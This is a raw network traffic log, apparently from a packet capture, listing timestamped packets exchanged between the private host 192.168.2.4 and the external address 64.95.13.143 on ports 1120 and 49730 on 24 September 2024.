Sep 24, 2024 17:46:10.406725883 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.406788111 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.406788111 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.406852007 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.406975031 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.406986952 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.407048941 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.407059908 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.407073021 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.407087088 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.407123089 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.407123089 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.407123089 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.407123089 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.407327890 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.407341003 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.407352924 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.407363892 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.407377005 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.407402039 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.407416105 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.407429934 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.407429934 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.407551050 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.407627106 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.408477068 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.441850901 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.441909075 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.441925049 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.441998005 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.442009926 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.442024946 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.442126989 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.442169905 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.442183018 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.442183971 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.442183971 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.442183971 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.442228079 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.442306995 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.442320108 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.442333937 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.442348957 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.442353010 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.442446947 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.442454100 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.442466974 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.442509890 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.442634106 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.442724943 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.442749023 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.442761898 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.442765951 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.442801952 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.442851067 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.442864895 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.442878962 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.442892075 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.442915916 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.442915916 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.442971945 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.443069935 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.444235086 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.444261074 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.444272995 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.444329977 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.444411039 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.444472075 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.444629908 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.444643974 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.444746017 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.444773912 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.444787979 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.444801092 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.444818020 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.444840908 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.444901943 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.477763891 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.477782965 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.477794886 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.477906942 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.477911949 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.477921963 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.477976084 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.478061914 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.478075027 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.478087902 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.478100061 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.478116989 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.478116989 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.478203058 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.478215933 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.478228092 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.478247881 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.478266001 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.478285074 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.478285074 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.478296995 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.478307962 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.478332043 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.478344917 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.478486061 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.478540897 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.478574991 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.478575945 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.478591919 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.478626013 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.478640079 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.478766918 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.478785992 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.478797913 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.478805065 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.479024887 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.479212046 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.479223967 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.479228973 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.479228973 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.479235888 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.479249001 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.479263067 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.479275942 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.479305983 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.479305983 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.479334116 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.479347944 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.479535103 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.479547977 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.479562998 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.479666948 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.479666948 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.479686022 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.479702950 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.479830980 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.480221987 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.480384111 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.480396032 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.480410099 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.480422974 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.480437040 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.480565071 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.480576992 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.480591059 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.480602980 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.480604887 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.480602980 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.480654955 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.480693102 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.498384953 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.498402119 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.498428106 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.498440027 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.498454094 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.498516083 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.498517990 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.498533010 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.498606920 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.498620987 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.498634100 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.498663902 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.498663902 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.498663902 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.498718977 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.498740911 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.498836040 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.498847961 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.498899937 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.498908997 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.498914003 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.499026060 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.499038935 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.499044895 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.499106884 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.499120951 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.499128103 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.499135017 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.499149084 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.499160051 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.499315023 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.499315023 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.499315023 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.499609947 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.499622107 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.499634027 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.499672890 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.499778986 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.499792099 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.499804020 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.499815941 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.499874115 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.499874115 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.534385920 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.534410000 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.534420967 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.534476042 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.534487963 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.534518957 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.534557104 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.534605026 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.534619093 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.534636021 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.534647942 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.534660101 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.534672976 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.534701109 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.534871101 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.534882069 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.534895897 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.534924984 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.534955025 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.534989119 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.535088062 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.535121918 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.535131931 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.535161018 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.535193920 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.535243034 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.535295010 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.535356998 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.535365105 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.535367966 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.535406113 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.535449982 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.535460949 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.535471916 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.535482883 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.535504103 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.535536051 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.535670996 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.535681963 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.535693884 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.535715103 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.535924911 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.535967112 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.535968065 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.535979033 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.536017895 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.536144018 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.536154985 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.536165953 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.536194086 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.536204100 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.536242962 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.574897051 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.574913979 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.574928999 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.574938059 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.575004101 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.575018883 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.575030088 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.575035095 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.575047970 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.575058937 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.575063944 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.575069904 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.575083017 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.575098991 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.575130939 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.575316906 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.575328112 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.575337887 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.575347900 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.575366020 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.575371027 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.575381041 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.575390100 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.575404882 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.575413942 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.575417995 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.575429916 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.575442076 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.575445890 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.575454950 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.575465918 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.575470924 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.575479031 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.575489044 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.575490952 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.575501919 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.575529099 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.575560093 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.576956987 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.576967955 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.576978922 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.576991081 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.577002048 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.577012062 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.577012062 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.577023983 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.577035904 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.577040911 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.577049017 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.577059984 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.577068090 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.577070951 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.577081919 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.577090979 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.577091932 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.577102900 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.577112913 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.577114105 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.577137947 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.577158928 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.592207909 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.592292070 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.592619896 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.592631102 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.592674971 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.593147039 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.593158960 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.593168974 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.593198061 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.593786955 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.593799114 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.593811035 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.593851089 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.593866110 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.594997883 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.595010042 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.595020056 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.595036030 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.595053911 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.595079899 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:10.596597910 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.596615076 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.596626043 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:10.596676111 CEST	49730	1120	192.168.2.4	64.95.13.143
